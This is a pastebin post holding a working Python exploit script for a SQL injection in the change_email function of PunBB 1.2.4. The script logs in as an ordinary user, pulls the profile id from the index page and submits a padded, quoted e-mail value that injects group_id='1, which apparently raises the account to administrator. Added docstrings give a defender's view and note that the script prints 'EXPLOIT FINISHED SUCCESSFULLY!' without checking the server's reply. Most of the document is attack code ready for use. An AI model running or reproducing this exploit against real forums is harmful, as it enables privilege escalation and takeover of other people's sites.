

Paste #709

Posted by: rega
Posted on: 2026-07-02 16:56:07
Age: 5 hrs ago
Views: 10
#!/usr/bin/env python3

import requests
import sys
import re
from urllib.parse import urljoin

class Colors:
    """ANSI SGR escape sequences used to colour the script's console output."""

    # Bright foreground colours, one per message severity.
    GREEN = "\033[92m"
    BLUE = "\033[94m"
    YELLOW = "\033[93m"
    RED = "\033[91m"
    # Text attributes and the accent colour used by the title box.
    BOLD = "\033[1m"
    CYAN = "\033[96m"
    # Restores the terminal's default rendition; emitted after every message.
    RESET = "\033[0m"

def banner():
    """Print the script's title box in bold cyan, then reset the terminal colours."""
    title_box = """
╔══════════════════════════════════════════════════════════════╗
║           PunBB 1.2.4 - change_email SQL Injection           ║
║                                                              ║
║                    by www.downgrade-net.ru                   ║
╚══════════════════════════════════════════════════════════════╝
    """
    print("".join((Colors.BOLD, Colors.CYAN, title_box, Colors.RESET)))

def success(msg):
    """Print *msg* in green behind a "[+] " marker, then reset the colour."""
    line = "".join((Colors.GREEN, "[+] ", msg, Colors.RESET))
    print(line)

def info(msg):
    """Print *msg* in blue behind a "[*] " marker, then reset the colour."""
    line = "".join((Colors.BLUE, "[*] ", msg, Colors.RESET))
    print(line)

def warning(msg):
    """Print *msg* in yellow behind a "[!] " marker, then reset the colour."""
    line = "".join((Colors.YELLOW, "[!] ", msg, Colors.RESET))
    print(line)

def error(msg):
    """Print *msg* in red behind a "[-] " marker, then reset the colour.

    The text goes to standard output, like every other message in this script.
    """
    line = "".join((Colors.RED, "[-] ", msg, Colors.RESET))
    print(line)

def main():
    """Log in to a PunBB forum as an ordinary user and post a crafted address
    to the ``change_email`` profile form.

    This is the proof-of-concept flow for the issue named in the banner
    (PunBB 1.2.4, ``change_email`` SQL injection). It takes five positional
    command-line arguments: forum URL, username, password, the account's
    e-mail address, and an e-mail domain. The process exits with status 1
    on a usage error, a failed login, or when no profile id can be found.

    Reviewer notes (defender's view):
      * The value sent as ``req_new_email`` contains double quotes, a comma,
        a single quote, a run of spaces and the literal ``group_id='1``.
        None of that belongs in a normal address. Strict server-side
        validation of the new address and parameterised queries in the
        ``change_email`` handler are the mitigations for this class of bug.
        Requests of this shape also stand out in web-server or WAF logs.
      * The final "EXPLOIT FINISHED SUCCESSFULLY!" box is printed
        unconditionally; the response to the last POST is never inspected.
        The output is therefore not evidence that a given installation is
        vulnerable.
      * The password is passed in argv, so it is visible in the process
        list and in shell history.
    """
    banner()

    # Five positional arguments are required (argv[0] is the script itself).
    if len(sys.argv) < 6:
        print(f"Usage: python3 {sys.argv[0]} <url> <username> <password> <email> <email domain>")
        print(f"Example: python3 {sys.argv[0]} http://localhost user password user@domain.com domain.com")
        sys.exit(1)

    url = sys.argv[1].rstrip('/')
    username = sys.argv[2]
    password = sys.argv[3]
    email = sys.argv[4]
    domain = sys.argv[5]

    # One Session so the login cookie is reused by the later requests.
    # NOTE(review): no timeout is passed to any request below; requests
    # then waits indefinitely on an unresponsive server.
    s = requests.Session()

    info("Logging in as normal user...")
    
    # Field names of the forum's login form as this script submits them.
    login_data = {
        'req_username': username,
        'req_password': password,
        'form_sent': '1'
    }

    r = s.post(urljoin(url, "/login.php?action=in"), data=login_data)

    # Login counts as successful only when the response is 200 and the
    # string form of that response's cookie jar mentions "punbb_cookie".
    if r.status_code != 200 or "punbb_cookie" not in str(r.cookies):
        error("Login failed!")
        sys.exit(1)

    success("Successfully logged in!")

    info("Extracting user_id...")
    r = s.get(urljoin(url, "/index.php"))
    
    # The first profile.php?id=<digits> link on the index page is taken as
    # the logged-in user's id (presumably the "profile" link — confirm).
    match = re.search(r'profile\.php\?id=(\d+)', r.text)
    if match:
        user_id = match.group(1)
        success(f"User-ID found: {user_id}")
    else:
        error("Could not find user_id!")
        sys.exit(1)

    info("Creating payload...")
    # Crafted "address": the quoted local part and host of <email>, then the
    # characters `","',`, then space padding, then the literal group_id='1,
    # and finally `"@<domain>`. The padding brings payload + padding + append
    # to 50 characters; what that length corresponds to on the server is not
    # shown on this page.
    payload = f'"{email.split("@")[0]}"@{email.split("@")[1]}","\','
    append = "group_id='1"
    padding = " " * (50 - len(append) - len(payload))
    final_email = payload + padding + append + f'"@{domain}'

    # Only the first 70 characters are echoed to the console.
    info(f"Payload: {final_email[:70]}...")

    success("Sending SQL Injection payload...")
    change_data = {
        'req_new_email': final_email,
        'form_sent': '1'
    }

    # Defender's view: this POST to profile.php?action=change_email is the
    # request to look for in logs; its req_new_email field carries the
    # quotes, spaces and group_id= text described above.
    r = s.post(urljoin(url, f"/profile.php?action=change_email&id={user_id}"), data=change_data)

    # Printed regardless of what the server answered; `r` is not examined.
    print(Colors.BOLD + Colors.GREEN + "\n" + "="*65)
    print("                  EXPLOIT FINISHED SUCCESSFULLY!")
    print("="*65 + Colors.RESET)
    print(Colors.YELLOW + "Now check your email and click the confirmation link\n" + Colors.RESET)

if __name__ == "__main__":
    # Script entry point. sys.exit() inside main() raises SystemExit, which is
    # not an Exception subclass, so those exit codes pass through untouched.
    # The two handlers below only print a message and let the process end
    # normally.
    try:
        main()
    except KeyboardInterrupt:
        error("Interrupted by user")
    except Exception as exc:
        error(f"Error: {exc}")

